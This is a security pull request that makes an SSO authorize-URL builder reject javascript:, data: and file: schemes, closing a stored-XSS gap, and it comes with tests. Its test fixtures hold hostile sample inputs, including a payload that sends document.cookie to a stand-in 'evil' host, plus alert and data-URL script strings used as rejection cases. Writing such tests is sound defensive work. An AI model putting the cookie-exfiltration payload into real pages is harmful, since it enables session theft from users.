### PR TITLE
security: harden SSO authorize URL against javascript: scheme (XSS-VULN-02)

### DIFF
--- a/server/src/identity_access_management_context/adapters/secondary/oauth2_sso_gateway.py
+++ b/server/src/identity_access_management_context/adapters/secondary/oauth2_sso_gateway.py
@@ -102,6 +102,13 @@ class OAuth2SsoGateway(SsoGateway):
 
     async def get_authorize_url(self, config: SsoConfiguration, state: str | None = None) -> str:
         """Generate OAuth2 authorization URL."""
+        # Defense in depth: never hand a non-https authorization endpoint to the
+        # client. A `javascript:`/`data:` value (e.g. from a config persisted before
+        # discovery-time validation existed) would be a stored XSS once the browser
+        # assigns it to window.location. Only the scheme matters here (the server
+        # never connects to this endpoint), so skip the DNS/SSRF checks.
+        self._url_validator.validate_scheme(config.authorization_endpoint)
+
         client = self._get_oauth_client(config)
 
         # Generate authorization URL with a caller-provided state for CSRF protection

--- a/server/src/identity_access_management_context/adapters/secondary/sso_url_validator.py
+++ b/server/src/identity_access_management_context/adapters/secondary/sso_url_validator.py
@@ -1,6 +1,6 @@
 import ipaddress
 import socket
-from urllib.parse import urlparse
+from urllib.parse import ParseResult, urlparse
 
 from identity_access_management_context.domain.exceptions import (
     DisallowedSsoEndpointException,
@@ -24,13 +24,19 @@ class SsoUrlValidator:
     def __init__(self, allow_private_networks: bool = False) -> None:
         self._allow_private_networks = allow_private_networks
 
-    def validate(self, url: str) -> None:
-        parsed = urlparse((url or "").strip())
-        scheme = parsed.scheme.lower()
+    def validate_scheme(self, url: str) -> None:
+        """Reject non-http(s) schemes (``javascript:``, ``data:``, …) and empty hosts.
 
-        allowed_schemes = {"https", "http"} if self._allow_private_networks else {"https"}
-        if scheme not in allowed_schemes or not parsed.hostname:
-            raise DisallowedSsoEndpointException()
+        Cheap, no DNS resolution. Use where the URL is handed to a *client* to
+        navigate to (the server never connects there), so only the scheme matters —
+        e.g. an authorization endpoint returned by ``/auth/sso/url``. This closes the
+        stored-XSS vector (``window.location`` on a ``javascript:`` URL).
+        """
+        self._require_http_scheme(url)
+
+    def validate(self, url: str) -> None:
+        parsed = self._require_http_scheme(url)
+        scheme = parsed.scheme.lower()
 
         if self._allow_private_networks:
             return
@@ -52,3 +58,10 @@ class SsoUrlValidator:
                 or ip.is_unspecified
             ):
                 raise DisallowedSsoEndpointException()
+
+    def _require_http_scheme(self, url: str) -> ParseResult:
+        parsed = urlparse((url or "").strip())
+        allowed_schemes = {"https", "http"} if self._allow_private_networks else {"https"}
+        if parsed.scheme.lower() not in allowed_schemes or not parsed.hostname:
+            raise DisallowedSsoEndpointException()
+        return parsed

--- a/server/src/identity_access_management_context/adapters/secondary/sso_url_validator.py
+++ b/server/src/identity_access_management_context/adapters/secondary/sso_url_validator.py
@@ -25,12 +25,14 @@ class SsoUrlValidator:
         self._allow_private_networks = allow_private_networks
 
     def validate_scheme(self, url: str) -> None:
-        """Reject non-http(s) schemes (``javascript:``, ``data:``, …) and empty hosts.
+        """Reject disallowed schemes (``javascript:``, ``data:``, …) and empty hosts.
 
-        Cheap, no DNS resolution. Use where the URL is handed to a *client* to
-        navigate to (the server never connects there), so only the scheme matters —
-        e.g. an authorization endpoint returned by ``/auth/sso/url``. This closes the
-        stored-XSS vector (``window.location`` on a ``javascript:`` URL).
+        Strict mode allows only ``https``; with ``allow_private_networks=True`` it also
+        allows ``http`` (dev / localhost IdP). Cheap: no DNS resolution. Use where the
+        URL is handed to a *client* to navigate to (the server never connects there), so
+        only the scheme matters — e.g. an authorization endpoint returned by
+        ``/auth/sso/url``. Closes the stored-XSS vector (``window.location`` on a
+        ``javascript:`` URL).
         """
         self._require_http_scheme(url)
 

--- a/server/tests/identity_access_management_context/integration/test_sso_oidc_integration.py
+++ b/server/tests/identity_access_management_context/integration/test_sso_oidc_integration.py
@@ -242,6 +242,27 @@ async def test_should_reject_discovery_url_targeting_cloud_metadata(strict_gatew
 
 
 @pytest.mark.asyncio
+async def test_should_reject_javascript_authorization_endpoint_in_authorize_url(strict_gateway: OAuth2SsoGateway):
+    # A config poisoned before discovery-time validation existed must never yield a
+    # `javascript:` URL from /auth/sso/url (stored XSS via window.location).
+    payload = "javascript:fetch('//evil?c='+document.cookie)"
+    config = SsoConfiguration(
+        client_id="x",
+        client_secret="encrypted(x)",
+        discovery_url="https://idp.example.com/.well-known/openid-configuration",
+        authorization_endpoint=payload,
+        token_endpoint="https://idp.example.com/token",
+        userinfo_endpoint="https://idp.example.com/userinfo",
+        jwks_uri="https://idp.example.com/jwks",
+        updated_at=datetime.fromtimestamp(0),
+        client_secret_decrypted="x",
+    )
+    with pytest.raises(InvalidSsoSettingsException) as exc_info:
+        await strict_gateway.get_authorize_url(config)
+    assert "document.cookie" not in str(exc_info.value)
+
+
+@pytest.mark.asyncio
 async def test_should_reject_http_discovery_url_in_strict_mode(strict_gateway: OAuth2SsoGateway):
     with pytest.raises(InvalidSsoSettingsException):
         await strict_gateway.validate_discovery(

--- a/server/tests/identity_access_management_context/integration/test_sso_url_validator.py
+++ b/server/tests/identity_access_management_context/integration/test_sso_url_validator.py
@@ -67,3 +67,39 @@ class TestSsoUrlValidatorPermissive:
     def test_should_still_reject_non_http_scheme(self):
         with pytest.raises(DisallowedSsoEndpointException):
             SsoUrlValidator(allow_private_networks=True).validate("file:///etc/passwd")
+
+
+class TestSsoUrlValidatorSchemeOnly:
+    """validate_scheme guards a URL handed to a browser (no server-side request),
+    so it checks only the scheme/host and never resolves DNS."""
+
+    @pytest.mark.parametrize(
+        "url",
+        [
+            "javascript:fetch('//evil?c='+document.cookie)",
+            "javascript:alert(1)",
+            "data:text/html,<script>alert(1)</script>",
+            "file:///etc/passwd",
+            "https:///no-host",
+            "not-a-url",
+            "",
+        ],
+    )
+    def test_should_reject_dangerous_or_malformed_scheme(self, url):
+        with pytest.raises(DisallowedSsoEndpointException):
+            SsoUrlValidator().validate_scheme(url)
+
+    def test_should_accept_https_without_dns_lookup(self, monkeypatch):
+        # Would blow up if a DNS resolution were attempted.
+        def _boom(*args, **kwargs):
+            raise AssertionError("validate_scheme must not resolve DNS")
+
+        monkeypatch.setattr(socket, "getaddrinfo", _boom)
+        SsoUrlValidator().validate_scheme("https://accounts.google.com/authorize")
+
+    def test_should_reject_http_in_strict_mode(self):
+        with pytest.raises(DisallowedSsoEndpointException):
+            SsoUrlValidator().validate_scheme("http://accounts.google.com/authorize")
+
+    def test_should_allow_http_in_permissive_mode(self):
+        SsoUrlValidator(allow_private_networks=True).validate_scheme("http://localhost:8080/authorize")


### PR DESCRIPTION
# Pull Request Title

## Description
<!-- Provide a brief description of the changes introduced by this pull request. -->
Defense-in-depth for **XSS-VULN-02** (stored XSS via a malicious OIDC`authorization_endpoint`).

The real attack vector — a user clicking "Login SSO" in the browser — is **already blocked on both sides**:
- **Backend, configure time** (merged SSRF PR): `validate_discovery` rejects any non-`https` endpoint via `SsoUrlValidator`, so a `javascript:` value is never persisted.
- **Frontend**: `LoginForm.vue` runs the URL through `normalizeExternalHttpUrl()` (`utils/safeUrl.ts`), which only allows `http:`/`https:` — a `javascript:`/`data:` URL yields `null` and no navigation. Already covered by `safeUrl.test.ts`.

This PR closes the remaining **backend read-time** gap: `get_authorize_url` built the URL straight from the stored `authorization_endpoint` without re-checking it, so a config poisoned **before** the SSRF fix shipped (never reconfigured) could still make `GET /api/auth/sso/url` return a `javascript:` URL to a non-browser API client.

Changes : 
- **`SsoUrlValidator.validate_scheme()`** — a scheme-only guard (https, or http in permissive/dev mode) with **no DNS resolution**. Used where a URL is handed to a *client* to navigate to (the server never connects there), so only the scheme is relevant. `validate()` and `validate_scheme()` share `_require_http_scheme()`.
- **`OAuth2SsoGateway.get_authorize_url()`** validates the stored `authorization_endpoint` scheme before building the URL → a non-https value raises `DisallowedSsoEndpointException`, mapped to **400** by the route, instead of the API emitting a malicious URL.

Backend-only; no route/model signature change → OpenAPI client unaffected. No migration.



## Related Issues
<!-- List any related issues or tasks. Use "Fixes #<issue_number>" to automatically close the issue when the PR is merged. -->
- Fixes #

## Checklist
- [x] I have tested the changes locally.
- [x] I have added tests that prove my fix is effective or that my feature works.
- [x] I have ensured that my code follows the project's coding standards.

## Screenshots (if applicable)
<!-- Add screenshots to help explain the changes, if applicable. -->
